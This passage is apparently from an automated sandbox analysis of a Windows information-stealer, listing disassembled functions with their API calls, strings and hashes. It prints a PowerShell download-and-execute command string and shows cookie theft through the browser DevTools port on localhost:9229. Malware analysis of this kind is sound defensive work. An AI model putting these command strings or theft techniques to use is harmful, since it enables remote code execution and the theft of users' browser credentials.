                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAD28
                                • lstrlen.KERNEL32(006F4AD4), ref: 006DAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAD5C
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006DAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAD91
                                • lstrlen.KERNEL32(00F203E8), ref: 006DADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAE6F
                                • lstrlen.KERNEL32(00000000), ref: 006DAE85
                                • lstrcpy.KERNEL32(00000000,00F203A0), ref: 006DAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: b5aac26c25e4960452379453feab79a57e0c4c4a3db003e157a6e80d1e0c7c8b
                                • Instruction ID: acb7a46c7161ffaeb0c4b9810769f2a92f00bc0a39a1762bc0fe4056693e27dd
                                • Opcode Fuzzy Hash: b5aac26c25e4960452379453feab79a57e0c4c4a3db003e157a6e80d1e0c7c8b
                                • Instruction Fuzzy Hash: 68B144709156169BCB22ABAADC48FBEB7BBFF40300F04052AA85997351DF34DD41CB96
                                Function 006E47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,006D72A4), ref: 006E47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 006E47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 006E480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 006E481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 006E482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 006E4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 006E4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 006E4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 006E4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 006E4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 006E4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 39f8ad2f10eba4a8efbd18b24174d9289e84eb0c36759d638ab8d78963d8cfdb
                                • Instruction ID: f029228b7c96132f3fdad0252211c0618c835fb7cd2ec12c710089a5ac8e2093
                                • Opcode Fuzzy Hash: 39f8ad2f10eba4a8efbd18b24174d9289e84eb0c36759d638ab8d78963d8cfdb
                                • Instruction Fuzzy Hash: DC117872992B24EB8710DFB4AC0DF763AB9BA49705306081AF792D2260EEF45844DF54
                                Function 006DBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DBE53
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006DBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006DBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DBEEB
                                • lstrlen.KERNEL32(')"), ref: 006DBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 006DBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006DBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006DBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 006DC00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 1ee32b8d7fca41ee7938b2d9df13df18261c15d1d39d0f238ea149751e2094a4
                                • Instruction ID: fe0f2dbd2b2273224752f566e23b66f59beb48597a4bae150122b19e5cd06d36
                                • Opcode Fuzzy Hash: 1ee32b8d7fca41ee7938b2d9df13df18261c15d1d39d0f238ea149751e2094a4
                                • Instruction Fuzzy Hash: 5A618D71E1064A9BCB21AFB69C89EBE7BAAFF44300F01142EE909D3315DF34D9018B95
                                Function 006E1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E184F
                                • lstrlen.KERNEL32(00F06F68), ref: 006E1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E18C1
                                • lstrlen.KERNEL32(006F4FA0), ref: 006E18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E18F4
                                • lstrcat.KERNEL32(00000000,006F4FA0), ref: 006E1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E192F
                                • lstrlen.KERNEL32(00F06FB8), ref: 006E1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E19A6
                                • lstrlen.KERNEL32(006F4FA0), ref: 006E19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E19D9
                                • lstrcat.KERNEL32(00000000,006F4FA0), ref: 006E19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A14
                                • lstrlen.KERNEL32(00F06FC8), ref: 006E1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A8B
                                • lstrlen.KERNEL32(00F07008), ref: 006E1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: d65a76b15af718b53099bf1886d4d630efe58a82dea6d26a2f20b33069f41d8d
                                • Instruction ID: 1958318817cfb4fa626f4974656022d502aa4f53fe0fea66898f2a44a380663a
                                • Opcode Fuzzy Hash: d65a76b15af718b53099bf1886d4d630efe58a82dea6d26a2f20b33069f41d8d
                                • Instruction Fuzzy Hash: 1E9108B06027479BD720AFBADC98E66B6EAFF45300B14482DA88AC7351DF34E841DB50
                                Function 006D4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006D47C5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4812
                                • lstrlen.KERNEL32(006F4B60), ref: 006D481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D483A
                                • lstrcat.KERNEL32(00000000,006F4B60), ref: 006D4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 006D48DC
                                • lstrlen.KERNEL32(?), ref: 006D48F0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 3a9c82b51f7ae6ccaa8f953b6b0005e65692b306d6a5d038a78a51262982fa07
                                • Instruction ID: 9a2cfbe211f40e9c4a42a7bbce85280e63d1aa7de8fd0957cb4882f6164bbbcc
                                • Opcode Fuzzy Hash: 3a9c82b51f7ae6ccaa8f953b6b0005e65692b306d6a5d038a78a51262982fa07
                                • Instruction Fuzzy Hash: B4B16C71A116469BCB21EFB6D899EAE77AAEF44300F04452DFC4AA7311DF34EC058B94
                                Function 006C92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C90C0: InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C90DF
                                  • Part of subcall function 006C90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006C90FC
                                  • Part of subcall function 006C90C0: InternetCloseHandle.WININET(00000000), ref: 006C9109
                                • strlen.MSVCRT ref: 006C92E1
                                • strlen.MSVCRT ref: 006C92FA
                                  • Part of subcall function 006C8980: std::_Xinvalid_argument.LIBCPMT ref: 006C8996
                                • strlen.MSVCRT ref: 006C9399
                                • strlen.MSVCRT ref: 006C93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 006C9547
                                • lstrcat.KERNEL32(?,006F1794), ref: 006C9559
                                • lstrcat.KERNEL32(?,?), ref: 006C956A
                                • lstrcat.KERNEL32(?,006F4B98), ref: 006C957C
                                • lstrcat.KERNEL32(?,?), ref: 006C958D
                                • lstrcat.KERNEL32(?,.txt), ref: 006C959F
                                • lstrlen.KERNEL32(?), ref: 006C95B6
                                • lstrlen.KERNEL32(?), ref: 006C95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 44777e5b9c6f708436835f38d9162dec126df80ae1e852fa478da4f94ae6b6ca
                                • Instruction ID: c2bf3ad634abc699b45d377cb1ea2e4c2dc097b072345f0ef5135a0636e59477
                                • Opcode Fuzzy Hash: 44777e5b9c6f708436835f38d9162dec126df80ae1e852fa478da4f94ae6b6ca
                                • Instruction Fuzzy Hash: 75E11571E00219DBDF54DFA9D894BEEBBB6FF48300F1044ADE909A7241DB309A45CBA5
                                Function 006DD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 006DD9A1
                                • memset.MSVCRT ref: 006DD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 006DDA1C
                                • lstrcat.KERNEL32(?,00F205B0), ref: 006DDA36
                                • lstrcat.KERNEL32(?,?), ref: 006DDA4A
                                • lstrcat.KERNEL32(?,00F1F020), ref: 006DDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006DDA95
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DDAFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: 8f4cf5b0a3537c9a5d61b52c73ac3797df4fe88cf542cef6206d108f841e8655
                                • Instruction ID: ba32f2d788a528e9d80be773d9a6fb604dcd0274172d215e0454939a425885bc
                                • Opcode Fuzzy Hash: 8f4cf5b0a3537c9a5d61b52c73ac3797df4fe88cf542cef6206d108f841e8655
                                • Instruction Fuzzy Hash: B6B15EB1D10259ABDB10EFB4D898EFE77BAFF88300F144569E94AA7350DA309E45CB50
                                Function 006CB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB3D9
                                • lstrlen.KERNEL32(006F4C50), ref: 006CB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB474
                                • lstrcat.KERNEL32(00000000,006F4C50), ref: 006CB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB4A9
                                • lstrlen.KERNEL32(00000000), ref: 006CB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB587
                                • lstrlen.KERNEL32(006F4AD4), ref: 006CB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB622
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006CB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB65E
                                • lstrlen.KERNEL32(?), ref: 006CB767
                                • lstrlen.KERNEL32(?), ref: 006CB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
